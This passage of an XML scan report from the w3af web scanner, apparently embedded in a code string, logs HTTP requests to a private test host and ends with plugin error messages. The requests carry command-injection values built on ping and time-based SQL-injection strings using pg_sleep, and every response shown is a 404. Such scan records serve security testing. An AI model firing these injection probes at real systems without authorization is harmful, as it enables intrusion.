                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="974">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="988">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="989">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1003">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1004">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1017">
                <http-request>
                    <status>GET http://10.12.68.43:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <error caller="threading">audit.rfi plugin needs to be correctly configured to use. Please set valid values for local address (eg. 10.5.2.5) and port (eg. 44449), or use the official w3af site as the target server for remote inclusions. The configuration error is: &quot;Listen address and port need to be configured&quot;</error>
    <error caller="threading">w3af won't be able to run plugin infrastructure.http_vs_https_dist. It seems that the user running the w3af process has not enough privileges.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
</w3af-run>
"""
